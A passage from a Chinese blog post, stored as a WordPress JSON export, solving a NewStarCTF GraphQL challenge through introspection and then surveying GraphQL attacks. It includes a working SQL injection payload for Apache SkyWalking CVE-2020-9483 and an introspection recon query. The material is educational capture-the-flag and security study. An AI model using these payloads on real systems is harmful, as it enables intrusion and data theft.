{"id":364,"date":"2022-10-22T14:42:44","date_gmt":"2022-10-22T06:42:44","guid":{"rendered":"http:\/\/119.45.47.125\/?p=364"},"modified":"2022-10-25T17:23:57","modified_gmt":"2022-10-25T09:23:57","slug":"graphql-study","status":"publish","type":"post","link":"http:\/\/119.45.47.125\/index.php\/2022\/10\/22\/graphql-study\/","title":{"rendered":"\u4ece NewStarCTF \u7684\u4e00\u9053\u9898\u76ee\u5b66\u4e60 GraphQL"},"content":{"rendered":"<p><strong>\u53c2\u8003\u6587\u7ae0\uff1a<\/strong><\/p>\n<ul>\n<li><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/zhuanlan.zhihu.com\/p\/124019191\" title=\"\u53d1\u73b0GraphQL\u7aef\u70b9\u548cSQL\u6ce8\u5165\u6f0f\u6d1e\">\u53d1\u73b0GraphQL\u7aef\u70b9\u548cSQL\u6ce8\u5165\u6f0f\u6d1e<\/a><\/li>\n<li><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/mp.weixin.qq.com\/s\/gp2jGrLPllsh5xn7vn9BwQ\" title=\"\u73a9\u8f6cgraphQL\">\u73a9\u8f6cgraphQL<\/a><\/li>\n<li><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/tillend.blog.csdn.net\/article\/details\/123754633\" title=\"GraphQL\uff08\u4e00\uff09\u57fa\u7840\u4ecb\u7ecd\u53ca\u5e94\u7528\u793a\u4f8b\">GraphQL\uff08\u4e00\uff09\u57fa\u7840\u4ecb\u7ecd\u53ca\u5e94\u7528\u793a\u4f8b<\/a><\/li>\n<li><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/www.yuque.com\/henry-weply\/penetration\/ps5n3g\" title=\"Attacking GraphQL\u2014\u2014\u4eceDVGA\u9776\u573a\u5b66\u4e60GraphQL\u5b89\u5168\">Attacking GraphQL\u2014\u2014\u4eceDVGA\u9776\u573a\u5b66\u4e60GraphQL\u5b89\u5168<\/a><\/li>\n<li><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/xzfile.aliyuncs.com\/upload\/zcon\/2018\/7_%E6%94%BB%E5%87%BBGraphQL_phithon.pdf\" title=\"\u653b\u51fbGraphQL\">\u653b\u51fbGraphQL<\/a><\/li>\n<li><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/www.anquanke.com\/post\/id\/156930\" title=\"GraphQL\u5b89\u5168\u6307\u5317\">GraphQL\u5b89\u5168\u6307\u5317<\/a><\/li>\n<li><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/cloud.tencent.com\/developer\/article\/1528799\" title=\"\u6211\u7684GraphQL\u5b89\u5168\u5b66\u4e60\u4e4b\u65c5\">\u6211\u7684GraphQL\u5b89\u5168\u5b66\u4e60\u4e4b\u65c5<\/a><\/li>\n<\/ul>\n<hr \/>\n<h3>\u6e90\u8d77<\/h3>\n<blockquote>\n  \u9898\u76ee\u6765\u6e90\u4e8e <a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/buuoj.cn\/match\/matches\/146\" title=\"NewStarCTF\">NewStarCTF<\/a> \u7684 WEEK2-ezAPI\n<\/blockquote>\n<hr \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/2-1024x453.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/2-1024x453.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u901a\u8fc7 POST \u4e0d\u540c\u7684<code>id<\/code>\u503c\u6765\u5f97\u5230\u76f8\u5e94\u7684\u67e5\u8be2\u4fe1\u606f\uff0c\u6700\u591a\u53ef\u4ee5\u67e5\u5230 6 \uff0c\u518d\u5f80\u540e\u5c31\u662f\u8fd4\u56de DEBUG \u4fe1\u606f<\/p>\n<p>\u4e00\u5f00\u59cb\u60f3\u7684\u662f\u4e0d\u662f\u5b58\u5728 SQL \u6ce8\u5165\uff0c\u4f46\u662f\u5c1d\u8bd5\u8fc7\u540e\u53d1\u73b0\u8fd4\u56de\u7684\u662f<code>Hacker! Only Number!<\/code>\uff0c\u60f3\u7740\u5e94\u8be5\u662f\u505a\u4e86<code>is_numric($id)<\/code>\u5904\u7406\uff1b\u5c1d\u8bd5\u7740\u6362\u4e2a\u601d\u8def\uff0c\u53d1\u73b0\u5b58\u5728\u5907\u4efd\u6587\u4ef6<code>www.zip<\/code><\/p>\n<p>\u6253\u5f00<code>index.php<\/code>\u53d1\u73b0\u4f7f\u7528\u4e86<code>GraphQL<\/code><\/p>\n<pre><code class=\"language-php line-numbers\">&lt;?php\n...\n\n$result = file_get_contents(\"http:\/\/graphql:8080\/v1\/graphql\", false, $context);\nif (isset($id)) {\n    if (waf($id)) {\n        isset($_POST['data']) ? $data = $_POST['data'] : $data = '{\"query\":\"query{\\nusers_user_by_pk(id:' . $id . ') {\\nname\\n}\\n}\\n\", \"variables\":null}';\n        $res = json_decode(send($data));\n        if ($res-&gt;data-&gt;users_user_by_pk-&gt;name !== NULL) {\n            echo \"ID: \" . $id . \"&lt;br&gt;Name: \" . $res-&gt;data-&gt;users_user_by_pk-&gt;name;}\n        else {\n            echo \"&lt;b&gt;Can't found it!&lt;\/b&gt;&lt;br&gt;&lt;br&gt;DEBUG: \";\n            var_dump($res-&gt;data);\n        }\n    } else {\n        ...\n        }\n    ...\n\n?&gt;\n<\/code><\/pre>\n<p>\u5148\u67e5\u4e0b<a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/graphql.cn\/\" title=\"\u4e2d\u6587\u6587\u6863\">\u4e2d\u6587\u6587\u6863<\/a>\uff0c\u91cc\u9762\u6709\u5173\u4e8e<code>GraphQL<\/code>\u7684\u8868\u8ff0<\/p>\n<blockquote>\n  GraphQL \u662f\u4e00\u4e2a\u7528\u4e8e API \u7684\u67e5\u8be2\u8bed\u8a00\uff0c\u662f\u4e00\u4e2a\u4f7f\u7528\u57fa\u4e8e\u7c7b\u578b\u7cfb\u7edf\u6765\u6267\u884c\u67e5\u8be2\u7684\u670d\u52a1\u7aef\u8fd0\u884c\u65f6\uff08\u7c7b\u578b\u7cfb\u7edf\u7531\u4f60\u7684\u6570\u636e\u5b9a\u4e49\uff09\u3002GraphQL \u5e76\u6ca1\u6709\u548c\u4efb\u4f55\u7279\u5b9a\u6570\u636e\u5e93\u6216\u8005\u5b58\u50a8\u5f15\u64ce\u7ed1\u5b9a\uff0c\u800c\u662f\u4f9d\u9760\u4f60\u73b0\u6709\u7684\u4ee3\u7801\u548c\u6570\u636e\u652f\u6491\u3002\n<\/blockquote>\n<p>\u591a\u6570\u6587\u7ae0\u91cc\u90fd\u662f\u5c06<code>GraphQL<\/code>\u4e0e<code>REST API<\/code>\u8fdb\u884c\u6bd4\u8f83\uff0c\u524d\u8005\u53ef\u4ee5\u4e0d\u7528\u7ef4\u62a4\u8fc7\u591a\u7684<code>API<\/code>\uff0c\u53ea\u9700\u8981\u4e00\u4e2a<code>URL<\/code>\u5c31\u53ef\u4ee5\u5904\u7406\u4e0d\u540c\u7684\u8bf7\u6c42\uff0c\u6539\u53d8<code>POST<\/code>\u4f20\u8f93\u7684\u503c\u5373\u53ef\uff0c\u4e0b\u56fe\u4e5f\u5f88\u597d\u7684\u89e3\u91ca\u4e86\u524d\u8005\u76f8\u8f83\u4e8e\u540e\u8005\u7684\u4f18\u70b9<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/image-e1666314268524-1024x844.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/image-e1666314268524-1024x844.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p><br><\/br><\/p>\n<p><code>GraphQL<\/code>\u63d0\u4f9b\u4e86\u4e00\u79cd<code>Introspection<\/code>\u673a\u5236<\/p>\n<blockquote>\n  We designed the type system, so we know what types are available, but if we didn&#8217;t, we can ask GraphQL, by querying the __schema field, always available on the root type of a Query. Let&#8217;s do so now, and ask what types are available.\n<\/blockquote>\n<p>\u5728\u5185\u7701\u7684\u673a\u5236\u4e0b\uff0c\u53ef\u4ee5\u5229\u7528<code>schema<\/code>\u548c<code>type<\/code>\u67e5\u8be2\u51fa\u53ef\u7528\u7684\u5bf9\u8c61\u548c\u5bf9\u8c61\u7684\u6240\u6709\u5b57\u6bb5\uff1b\u4f46\u662f\u5982\u679c\u914d\u7f6e\u4e0d\u5f53\uff0c\u5f88\u5bb9\u6613\u9020\u6210\u4fe1\u606f\u6cc4\u6f0f<\/p>\n<p>\u5728 <a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/github.com\/doyensec\/inql\/blob\/master\/inql\/introspection.py\" title=\"InQL Scanner\">InQL Scanner<\/a> \u53ef\u4ee5\u627e\u5230\u7528\u4e8e\u67e5\u8be2\u7684 <code>payload<\/code>\uff0c\u8fd4\u56de\u5305\u8fd4\u56de\u7684\u5c31\u662f\u8be5API\u7aef\u70b9\u7684\u6240\u6709\u4fe1\u606f<\/p>\n<pre><code class=\"language-python line-numbers\">introspection_query =  \"query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}\"\n<\/code><\/pre>\n<p>\u5728\u9898\u76ee\u91cc\u76f4\u63a5\u4f20\u5165<code>$data<\/code>\uff0c\u7528<code>Postman<\/code>\u53d1\u5305\u53ef\u80fd\u65b9\u4fbf\u70b9<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/3-1024x445.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/3-1024x445.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p><br><\/br><\/p>\n<pre><code class=\"language-javascript line-numbers\">      object(stdClass)#181 (8) {\n        [\"kind\"]=&gt;\n        string(6) \"OBJECT\"\n        [\"name\"]=&gt;\n        string(28) \"ffffllllaaagggg_1n_h3r3_flag\"\n        [\"description\"]=&gt;\n        string(59) \"columns and relationships of \"ffffllllaaagggg_1n_h3r3.flag\"\"\n        [\"fields\"]=&gt;\n        array(1) {\n          [0]=&gt;\n          object(stdClass)#182 (6) {\n            [\"name\"]=&gt;\n            string(4) \"flag\"\n            [\"description\"]=&gt;\n            NULL\n            [\"args\"]=&gt;\n            array(0) {\n            }\n            [\"type\"]=&gt;\n            object(stdClass)#183 (3) {\n              [\"kind\"]=&gt;\n              string(8) \"NON_NULL\"\n              [\"name\"]=&gt;\n              NULL\n              [\"ofType\"]=&gt;\n              object(stdClass)#184 (3) {\n                [\"kind\"]=&gt;\n                string(6) \"SCALAR\"\n                [\"name\"]=&gt;\n                string(6) \"String\"\n                [\"ofType\"]=&gt;\n                NULL\n              }\n            }\n            [\"isDeprecated\"]=&gt;\n            bool(false)\n            [\"deprecationReason\"]=&gt;\n            NULL\n          }\n        }\n        [\"inputFields\"]=&gt;\n        NULL\n        [\"interfaces\"]=&gt;\n        array(0) {\n        }\n        [\"enumValues\"]=&gt;\n        NULL\n        [\"possibleTypes\"]=&gt;\n        NULL\n      }\n<\/code><\/pre>\n<p>\u6240\u4ee5\u76f4\u63a5\u5230<code>ffffllllaaagggg_1n_h3r3_flag<\/code>\u53bb\u67e5<code>flag<\/code>\u5c31\u53ef\u4ee5\u4e86<\/p>\n<blockquote>\n  Every GraphQL service has a <code>query<\/code> type and may or may not have a <code>mutation<\/code> type. These types are the same as a regular object type, but they are special <strong>because they define the entry point of every GraphQL query<\/strong>\n<\/blockquote>\n<pre><code class=\"language-lua line-numbers\">$data={\"query\":\"query{ffffllllaaagggg_1n_h3r3_flag{flag}}\"}\n<\/code><\/pre>\n<hr \/>\n<h3>\u5b66\u4e60 &amp;&amp; \u9776\u573a\u7ec3\u4e60<\/h3>\n<hr \/>\n<p>\u5f80\u5c4a\u5404\u7c7b CTF \u6bd4\u8d5b\u4e2d\u4e5f\u51fa\u73b0\u8fc7\u4e0d\u5c11<code>GraphQL<\/code>\u7684\u8003\u70b9\uff0cp\u795e\u5728\u5148\u77e5\u767d\u5e3d\u5927\u4f1a\u4e0a\u4e5f\u53d1\u8868\u4e86\u76f8\u5173\u5b89\u5168\u8bae\u9898<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/2-1-1024x507.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/2-1-1024x507.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<hr \/>\n<h4>1.\u6ce8\u5165<\/h4>\n<p>\u5982\u679c\u6ca1\u6709\u5bf9\u7528\u6237\u8f93\u5165\u7684\u53c2\u6570\u503c\u8fdb\u884c\u5408\u7406\u5904\u7406\u800c\u4e14\u9009\u62e9\u4e86\u62fc\u63a5\u7684\u65b9\u5f0f\u8fdb\u884c\u67e5\u8be2\uff0c\u6709\u53ef\u80fd\u5c31\u4f1a\u5bfc\u81f4\u653b\u51fb\u8005\u6ce8\u5165\u6076\u610f\u8bed\u53e5\u4ece\u800c\u6539\u53d8<code>GraphQL<\/code>\u7684\u8bed\u53e5\u7ed3\u6784<\/p>\n<p>\u5371\u5bb3\u6027\u6bd4\u8f83\u5927\u7684\u4e00\u4e2a\u5b9e\u4f8b\u5c31\u662f CVE-2020-9483 Apache SkyWalking graphql SQL\u6ce8\u5165\u6f0f\u6d1e<\/p>\n<p>\u5728 <a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/github.com\/apache\/skywalking\/pull\/4639\/commits\/2b6aae3b733f9dbeae1d6eff4f1975c723e1e7d1?diff=split&amp;w=0\" title=\"Fix\">Fix<\/a> \u4e2d\u53ef\u4ee5\u6bd4\u5bf9\u4fee\u590d\u524d\u540e\u7684\u4ee3\u7801<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1-1-1024x360.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1-1-1024x360.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p><br><\/p>\n<p>\u53ef\u4ee5\u770b\u5230\uff0c\u5728\u539f\u7248\u672c\u4e2d<code>idValues<\/code>\u662f\u76f4\u63a5\u62fc\u63a5\u8fc7\u53bb\u7684\uff0c\u4fee\u590d\u540e\u7684\u4ee3\u7801\u5f15\u5165\u4e86<code>?<\/code>\u8fdb\u884c\u5360\u4f4d\u9884\u7f16\u8bd1<\/p>\n<p>\u6b64\u5916\uff0c\u5728 <code>LogQuery<\/code>\u4e5f <a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/github.com\/apache\/skywalking\/commit\/0bd81495965d801315dd7417bb17333ae0eccf3b\" title=\"remove\">remove<\/a>\u4e86<code>String metricName<\/code><\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1-2-1024x536.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1-2-1024x536.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p><br><\/p>\n<p>\u867d\u7136\u6709\u6ce8\u5165\u7c7b\u7684\u95ee\u9898\uff0c\u4f46\u662f\u5728\u6b63\u5e38\u7684\u4e1a\u52a1\u4e2d\u5e94\u8be5\u4e0d\u4f1a\u9047\u5230\u5f88\u591a\uff0c\u53c2\u6570\u5316\u67e5\u8be2\u7684\u5f15\u5165\u53ef\u4ee5\u5f88\u597d\u7684\u89e3\u51b3\u53ef\u80fd\u51fa\u73b0\u7684\u5b89\u5168\u95ee\u9898<\/p>\n<p>\u7528 Vulhub \u642d\u5efa\u6f0f\u6d1e\u73af\u5883\u590d\u73b0\u4e0b\uff1a<\/p>\n<pre><code class=\"language-lua line-numbers\">{\n    \"query\":\"query queryLogs($condition: LogQueryCondition) {\n  queryLogs(condition: $condition) {\n    total\n    logs {\n      serviceId\n      serviceName\n      isError\n      content\n    }\n  }\n}\n\",\n    \"variables\":{\n        \"condition\":{\n            \"metricName\":\"1ndweb\",\n                        \"endpointId\":\"1\",\n                    \"traceId\":\"1\",\n                    \"state\":\"ALL\",\n                    \"stateCode\":\"1\",\n            \"paging\":{\n                \"pageSize\":10\n            }\n        }\n    }\n}\n<\/code><\/pre>\n<p>\u6b64\u65f6\u6211\u4eec\u4f20\u5165\u7684<code>metricName<\/code>\u53c2\u6570\u7684\u503c\u88ab\u62fc\u63a5\u5230<code>from<\/code>\u540e\u9762\uff0c\u5982\u679c\u62fc\u63a5\u6076\u610f\u67e5\u8be2\u8bed\u53e5\u5373\u53ef\u9020\u6210\u6ce8\u5165<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1-4-1024x446.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1-4-1024x446.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p><code>&quot;metricName&quot;:&quot;INFORMATION_SCHEMA.USERS union all select h2version())a where 1=? or 1=? or 1=? --&quot;<\/code><\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1-3-1024x506.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1-3-1024x506.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u5f53\u7136\uff0c\u4e5f\u53ef\u4ee5\u5229\u7528<code>file_write<\/code>\u5199\u5165\u6076\u610f\u7c7b\uff0c\u518d\u5229\u7528<code>LINK_SCHEMA<\/code>\u52a0\u8f7d\u6076\u610f\u7c7b\u4ece\u800c\u9020\u6210 RCE<\/p>\n<p>\u5177\u4f53\u64cd\u4f5c\u53ef\u53c2\u8003 <a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/cloud.tencent.com\/developer\/article\/1804563\" title=\"Apache Skywalking &lt;=8.3 SQL\u6ce8\u5165\u5206\u6790\u590d\u73b0\">Apache Skywalking &lt;=8.3 SQL\u6ce8\u5165\u5206\u6790\u590d\u73b0<\/a><\/p>\n<hr \/>\n<h4>2.\u4fe1\u606f\u6cc4\u6f0f<\/h4>\n<p>\u5728\u5b9e\u9645\u4e1a\u52a1\u573a\u666f\u4e2d\uff0c\u51fa\u73b0\u76f8\u5bf9\u8f83\u591a\u7684\u5e94\u8be5\u8fd8\u662f\u6743\u9650\u914d\u7f6e\u4e0d\u5f53\u5bfc\u81f4\u7684\u4fe1\u606f\u6cc4\u6f0f\u548c\u62d2\u7edd\u670d\u52a1\u653b\u51fb\uff0c\u5f53\u7136\u51fa\u73b0\u4fe1\u606f\u6cc4\u9732\u672c\u8eab\u548c API \u8c03\u7528\u6ca1\u6709\u5173\u7cfb\uff0c\u66f4\u591a\u7684\u662f\u8c03\u7528\u65f6\u7684\u9274\u6743\u6ca1\u6709\u505a\u597d<\/p>\n<p>\u5728\u6587\u6863\u7684 Authorization \u90e8\u5206<code>GraphQL<\/code>\u4e5f\u7ed9\u51fa\u4e86\u5efa\u8bae<\/p>\n<blockquote>\n  Delegate authorization logic to the business logic layer\n<\/blockquote>\n<p>\u5982\u679c\u5f00\u53d1\u4eba\u5458\u6ca1\u6709\u505a\u597d\u5404\u4e2a<code>Query<\/code>\u548c<code>Mutation<\/code>\u7684\u6388\u6743\u9274\u6743\uff0c\u653b\u51fb\u8005\u5f88\u5bb9\u6613\u5229\u7528<code>GraphQL<\/code>\u7684\u5185\u7701\u673a\u5236\uff0c\u76f4\u63a5\u83b7\u53d6\u540e\u7aef\u5b9a\u4e49\u7684\u6240\u6709\u63a5\u53e3\u4fe1\u606f<\/p>\n<p><a class=\"wp-editor-md-post-content-link\" href=\"http:\/\/wiki.peiqi.tech\/wiki\/webapp\/GitLab\/GitLab%20Graphql%E9%82%AE%E7%AE%B1%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E%20CVE-2020-26413.html\" title=\"CVE-2020-26413 GitLab Graphql\u90ae\u7bb1\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e\">CVE-2020-26413 GitLab Graphql\u90ae\u7bb1\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e<\/a> \u5c31\u662f\u5728\u5df2\u77e5\u7528\u6237\u540d\u7684\u524d\u63d0\u4e0b\uff0c\u5229\u7528<code>Graphql<\/code>\u8fdb\u884c\u67e5\u8be2\u9020\u6210\u90ae\u7bb1\u6cc4\u9732<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1-5-1024x637.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/10\/1-5-1024x637.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u4f46\u662f\u5982\u679c\u6ca1\u6709\u5df2\u77e5\u7684\u7528\u6237\u540d\uff0c\u4e5f\u53ef\u4ee5\u5229\u7528<code>GraphqQL<\/code>\u67e5\u8be2\u4e00\u6b21\u6027\u5f97\u5230\u6240\u6709\u7684\u7528\u6237\u540d\u548c\u90ae\u7bb1\uff0c\u5177\u4f53\u7684 payload \u53ef\u53c2\u8003 PeiQi\u6587\u5e93<\/p>\n<p>\u9664\u6b64\u4e4b\u5916\uff0c\u5728p\u795e\u7684\u6587\u6863\u4e2d\u4e5f\u63d0\u5230\u4e86<\/p>\n<blockquote>\n  \u591a\u591a\u5173\u6ce8\u5e9f\u5f03\u7684\u5b57\u6bb5\uff08deprecated fields\uff09\u591a\u591a\u5173\u6ce8\u5e9f\u5f03\u7684\u5b57\u6bb5\uff08deprecated fields\uff09\n<\/blockquote>\n<p>\u5982\u679c\u5f00\u53d1\u4eba\u5458\u6ca1\u6709\u5bf9\u5e9f\u5f03\u5b57\u6bb5\u8fdb\u884c\u5408\u7406\u7684\u5904\u7406\uff0c\u901a\u8fc7\u6307\u5b9a<code>includeDeprecated<\/code>\u53c2\u6570\u4e3a<code>true<\/code>\uff0c<code>__type<\/code> \u4ecd\u7136\u53ef\u4ee5\u5c06\u5e9f\u5f03\u5b57\u6bb5\u66b4\u9732\u51fa\u6765\uff0c\u5e76\u6709\u53ef\u80fd\u7ee7\u7eed\u5229\u7528\u8fd9\u4e9b\u5b57\u6bb5\u8fdb\u884c\u67e5\u8be2<\/p>\n<p>\u89e3\u51b3\u65b9\u6848\u53ef\u4ee5\u53c2\u8003<a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/www.anquanke.com\/post\/id\/156930\" 